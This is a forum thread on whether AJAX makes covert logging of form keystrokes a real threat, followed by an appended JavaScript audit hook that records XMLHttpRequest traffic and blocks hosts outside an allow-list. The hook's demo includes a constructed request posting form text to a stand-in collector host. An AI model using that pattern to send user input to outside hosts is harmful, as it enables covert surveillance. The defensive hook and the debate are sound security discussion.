
Thread: Using the XMLHttpRequest Object and AJAX to Spy On You

  1. #1

    Using the XMLHttpRequest Object and AJAX to Spy On You

    This week's guest commentary, by Earle Castledine, discusses the not-so-obvious security risks of asynchronous processing from Web forms using AJAX. Give it a read and let us know whether this use of Ajax worries you.

    http://www.devx.com/webdev/Article/28861

    Lori Piquet
    DevX

  2. #2
    Join Date: Aug 2005 | Location: Louisville, KY | Posts: 1

    XMLHttpRequest is no different than a hidden iframe

    As the author fleetingly stated, the same asynchronous communication with the server has been available for years with JavaScript and a hidden iframe (an iframe with "display: none;" style). I really don't see how using XMLHttpRequest allows someone to be more devious than sending the user's keystrokes and other actions to the server in a hidden iframe.

    --Dan

  3. #3
    Join Date: Aug 2005 | Posts: 1

    This is a beat-up

    And I presume the author proposes that .NET thick client software is the solution!!

    The risks outlined by the author are totally exaggerated. I mean to say, what is the risk that I am here, typing away to create a message thread in a public forum, and suddenly I forget where I am and I start typing my Internet Banking User Name and Password. If I do that, I've got a lot more to worry about than XMLHttpRequest.

    And of course, what the author doesn't mention is that standard applications written in .NET or a zillion other languages are potentially far more harmful than anything XMLHttpRequest can do. Spyware anyone!

    This is an absolute beat-up.

  4. #4
    Join Date: Aug 2005 | Posts: 1

    I can do this already.

    This was already a threat before AJAX was a word and remote calls were reasonably easy to work with, and people seem to have dealt with it just fine. Blaming a more user friendly interface for potential key logging threats seems like a disconnected concept to me.

    Any knowledgeable web developer can do this now if they wanted to. AJAX isn't going to make honest devs into crooks.

  5. #5
    Join Date: Sep 2005 | Posts: 1

    using eval will not hide evil javascript

    The article suggests a line such as eval( xmlReq.responseText ); would be able to hide evil JavaScript from a user. True, it won't appear in the source code, but the response will certainly be cached locally, allowing it to be viewed.

  6. #6
    Join Date: Sep 2005 | Posts: 1

    Eh...

    I can see this being an issue if you could log keystrokes bound for another site, in a different window, etc. But as the author describes it, I'm not impressed. The notion that companies are going to log textarea entries looking for brainfarts is, frankly, a bit ridiculous. Can you imagine the expense that would go into trying to mine this information for anything useful?

    Phishers might get some use out of it -- the first time I was ever hit by a phishing attack I think I may have actually typed the first couple numbers of my credit card before thinking, wait a minute. But it's hard to see this as a really serious threat.

    Moreover, the technology already exists. What's the suggestion here? That developers will stop using it for valid purposes because a few individuals are trying to get away with something nefarious? Kinda like how people stopped making guns after a few murders occurred?

    Sorry, you're going to have to do better to scare me.

  7. #7
    Join Date: Sep 2005 | Posts: 1

    I think many posters are missing the point here. It's not that it wasn't possible to do this before AJAX became a buzzword. The reason it becomes a big threat is because, no doubt, AJAX apps will soon become widespread and no doubt cut & paste scripts will be (even more than they are now) readily available with nice online tutorials and "AJAX in 21 days" will be at Amazon. (If criminals had to learn the mechanics of how to use gunpowder to accelerate a projectile, instead of just buying/stealing a gun...)

    It's the whole "Security by Obscurity" concept. Think of how many more security exploits fell upon Firefox after it gained significant market share.

    And, the very problem IS the amount of Phishers out there looking for a better way to make their sites look and act more authentic. No, MS is not going to steal your CC number.

    There is nothing inherently wrong with AJAX (I think it ROCKS!), the author is just trying to make the point that it allows malicious scripts/exploits/phishes to become a lot less obvious. Mark my word, you WILL hear about many AJAX-based exploits in the next year.

    Before getting emotional about hearing bad news that your latest toy is being taken off the shelf because children are choking on it, UNDERSTAND that the author is NOT calling for a stop to using AJAX. He's just trying to give savvy users the heads up to watch out for exploits.

    However, it's not going to stop me from using AJAX.

  8. #8
    Join Date: Nov 2005 | Posts: 1

    I've started looking into doing this for my wife's company (she's a recruiter) as a small, real-time programming test. They've been complaining about having hired several programmers recently that looked good on paper and resume, but once they got the job it became clear their skills were NOT what they represented.

    The programming manager and other programmers are interested in having a real-time programming test along the lines of "Fix this code" while being able to watch the progress of the applicant during the phone screening. If someone is unable to find and fix a few simple errors in a snippet of code, then it's probably not worth bringing them in for interviews and wasting everybody's time.

    So there's definitely some valid real world applications for using the technology like this, provided it's made clear to the other user that what they do is being monitored.

  9. #9
    Join Date: Jan 2006 | Posts: 1

    If It's a Fad, Fight It with Fearmongering!

    I have seen a number of posts on blogs across the Internet that laid AJAX to waste as a fad, a worthless trend, and an inappropriately-named non-language that should be more appropriately called "Asynchronous JavaScript and XML" without ever shortening it, because real men only use real acronyms for real technologies.

    It all entertains me, but then again, so does AJAX itself. I find it wickedly exciting to do what I can to adapt to the changing capabilities of online applications, and while AJAX's key idea may not be new, its newfound popularity at least made me aware that the technique was not only possible but that it was the driving force behind some new sites that I had long since fallen in love with.

    If I had to briefly describe the idea of AJAX as a whole, I would dedicate maybe a sentence to what occupies three section headers in this article. The sentence would read, "While there are potential security hazards associated with possible confusion to the end-user and the ability to load without notification, these hazards are rarely practical or logical in their execution, and the beneficial uses of AJAX by benevolent webmasters far outweigh this pre-existing danger." That's just how it is.

    The bottom line is that paranoia as a whole (a feeling this article promotes to its closing question, "Scared yet?") has never overwhelmed the browsing public so severely that they gave up completely harmless and highly beneficial services for the sake of personal security. When suspicious folks started looking through WHOIS records, they made domain registration optionally private. When some angry people attacked the people and ideas of the western world via aircraft, it took a few weeks for us to start buying our plane tickets again. When the banks started noticing a growing trend of identity theft, they began teaching lessons on how to prevent it, not simply suggesting people should just cower in fear. Now, when JavaScript-savvy people begin to find these web sites (corporate or otherwise in nature), the public will fight back (just as they always have) and toss the site to the media hounds, thus informing a huge portion of the online world and alerting us all not to make the mistake of trusting that site.

    There is simply no reason why AJAX will meet its death at the hands of fearmongering. Online banking has yet to meet its death despite the countless phishing sites that litter the web, and eCommerce is so thriving that its effect on the global economy remains outstanding.

    If people allow themselves to at all distrust their fellow friendly web developer because they use a technique that someone somewhere exploited, or if they stop exercising the freedom granted by the Internet to access and send information because of pure fear, they have surrendered their psychological authority to the same malicious people who sought to harm them in the first place.

    Besides, what corporation would have either the nerve or the corporate logic to implement the suggested Apple activity? I can name all too many times when I left the keyboard shortly, when someone else was typing my request and wanted to be humorous, or when I simply mistyped my thoughts into a form. What human is capable of discerning those innocent situations from the one listed? It would be a matter of pure assumption, something the contract-centered corporations of today know better than to do with their customers.

    Besides, e-mail isn't affected by AJAX anyway. I say this not just to be a nerd who corrects your idea (I know you meant a web form), but to say that your overgeneralization makes a good point. E-mail will be the likely solution people implement if they really do get paranoid of AJAX. AJAX wouldn't dare reach their pretyped text because e-mail, in all its old-fashioned goodness, is still the kind of system that, for the most part, websites can't ever reach out of their own window and grab other applications that don't authorize it.

    Nevertheless, as I sit here developing one of my first online applications with good old AJAX, I can't help but feel excited that there will soon come a day (if it's not here already) when enough literature, online and in print, will exist that a large number of web sites will start adopting this efficient idea and others like it (Flex, etc.), rendering the web a smoother and more continuous place. Who knows, it might also have the side effect of boosting popularity for CSS-supported layouts, making the web as a whole look even better.

  10. #10
    Join Date: Feb 2006 | Posts: 1

    Question how to disable XMLHttpRequest?

    The author asked "Not ready to rise up and strip the XMLHttpRequest code from your browser?"

    Is there a way to do this, if I wanted to?

  11. #11
    Join Date: Jul 2006 | Posts: 1

    Quote Originally Posted by SlvrEagle23:
    ...

    If I had to briefly describe the idea of AJAX as a whole, I would dedicate maybe a sentence to what occupies three section headers in this article. The sentence would read, "While there are potential security hazards associated with possible confusion to the end-user and the ability to load without notification, these hazards are rarely practical or logical in their execution, and the beneficial uses of AJAX by benevolent webmasters far outweigh this pre-existing danger." That's just how it is.

    The bottom line is that paranoia as a whole (a feeling this article promotes to its closing question, "Scared yet?") has never overwhelmed the browsing public so severely that they gave up completely harmless and highly beneficial services for the sake of personal security. When suspicious folks started looking through WHOIS records, they made domain registration optionally private. When some angry people attacked the people and ideas of the western world via aircraft, it took a few weeks for us to start buying our plane tickets again. When the banks started noticing a growing trend of identity theft, they began teaching lessons on how to prevent it, not simply suggesting people should just cower in fear. Now, when JavaScript-savvy people begin to find these web sites (corporate or otherwise in nature), the public will fight back (just as they always have) and toss the site to the media hounds, thus informing a huge portion of the online world and alerting us all not to make the mistake of trusting that site.

    There is simply no reason why AJAX will meet its death at the hands of fearmongering. Online banking has yet to meet its death despite the countless phishing sites that litter the web, and eCommerce is so thriving that its effect on the global economy remains outstanding.

    ...

    Besides, what corporation would have either the nerve or the corporate logic to implement the suggested Apple activity? I can name all too many times when I left the keyboard shortly, when someone else was typing my request and wanted to be humorous, or when I simply mistyped my thoughts into a form. What human is capable of discerning those innocent situations from the one listed? It would be a matter of pure assumption, something the contract-centered corporations of today know better than to do with their customers.

    This is exactly right. I second this.

    Best, Brad

  12. #12
    Join Date: Mar 2008 | Posts: 1

    The Author is Ignorant

    He really thinks all of a sudden communication is hidden because of XMLHttpRequests... or even iframes? Companies have been spying on shopping patterns for thousands of years. It has gotten more sophisticated though. Companies today can use cameras and facial recognition software to automatically gain your "UserID" and track your shopping patterns if they wanted.

    If you are really such a paranoid person when it comes to the internet... then just get a Network Analyzer, like Commview. That is the only way to know what is leaving your computer... and it goes for Web pages, windows apps, spyware, whatever you are afraid of. You can even set up alerts to go off for whatever scenario you imagine. Technical advances happen on both fronts.

    There is nothing that will stop internet applications from evolving. The internet today is still stone-age... like playing Pacman on an Atari versus playing Halo online with your buddies. People aren't going to give up their Xbox because they are afraid Microsoft has the capability to figure out how long it takes for you to choose a movie for rent.
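Post #10 asks whether XMLHttpRequest can be switched off, and post #12 answers that the only real control is watching what leaves the machine. The block below is an added example, not code from this thread, the DevX article, or any named product: it shows the in-page version of that idea, an audit hook that wraps `XMLHttpRequest.prototype.open` and `send` so every request is recorded and any request to a host outside an allow-list is refused before it is transmitted. The `installXhrAudit`, `demo`, and `StubXMLHttpRequest` names, the page origin `https://shop.example`, and the collector host `collector.invalid` are all assumptions constructed for the example; the stub stands in for the browser's real constructor so the file runs under Node.

```javascript
// Added example (not from the thread): an audit/allow-list hook around
// XMLHttpRequest. Install it from a user script or the page's own bootstrap
// code, before any other script runs, to see and constrain XHR traffic.
function installXhrAudit(XhrCtor, pageOrigin, allowedHosts) {
  const log = [];                       // one entry per send() attempt
  const proto = XhrCtor.prototype;
  const origOpen = proto.open;
  const origSend = proto.send;

  proto.open = function (method, url, ...rest) {
    // Resolve relative URLs against the page origin so "/cart/update" and
    // "http://collector.invalid/log" are compared on equal terms.
    const resolved = new URL(url, pageOrigin);
    this.__audit = {
      method: String(method).toUpperCase(),
      url: resolved.href,
      host: resolved.host,
      allowed: allowedHosts.includes(resolved.host),
      body: null,
      bodyLength: 0,
    };
    return origOpen.call(this, method, url, ...rest);
  };

  proto.send = function (body) {
    // send() without a prior open() is recorded as unknown and refused.
    const entry = this.__audit ||
      { method: '?', url: '?', host: '?', allowed: false, body: null, bodyLength: 0 };
    entry.body = body == null ? null : String(body);
    entry.bodyLength = entry.body ? entry.body.length : 0;
    log.push(entry);
    if (!entry.allowed) {
      // Refuse off-list traffic; the calling script sees an error rather
      // than a silently successful request.
      throw new Error(`XHR to ${entry.host} blocked by audit policy`);
    }
    return origSend.call(this, body);
  };

  return {
    log,
    uninstall() { proto.open = origOpen; proto.send = origSend; },
  };
}

// Constructed stand-in for the browser's XMLHttpRequest (assumption): it only
// records what a real object would have transmitted, so the example runs
// outside a browser.
class StubXMLHttpRequest {
  open(method, url) { this.method = method; this.url = url; }
  send(body) { this.sent = body; }
}

// Walk through one allowed same-origin request and one refused off-list
// request, returning the audit log so the outcome can be inspected.
function demo() {
  const audit = installXhrAudit(StubXMLHttpRequest, 'https://shop.example', ['shop.example']);
  const blocked = [];

  const a = new StubXMLHttpRequest();   // the page's own legitimate call
  a.open('POST', '/cart/update');
  a.send('item=42');

  const b = new StubXMLHttpRequest();   // constructed off-origin post of form text
  b.open('POST', 'http://collector.invalid/log');
  try { b.send('text=hello'); } catch (e) { blocked.push(e.message); }

  audit.uninstall();
  return { log: audit.log, blocked, sentByB: b.sent };
}
```

The hook only sees what goes through XMLHttpRequest; a hidden iframe or form submission of the kind post #2 describes bypasses it entirely, which is why post #12's network-level view remains the more complete check. Reading `log` after the page has been used for a while shows which hosts receive request bodies and how large those bodies are, which is usually enough to spot form contents being sent somewhere they should not go.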
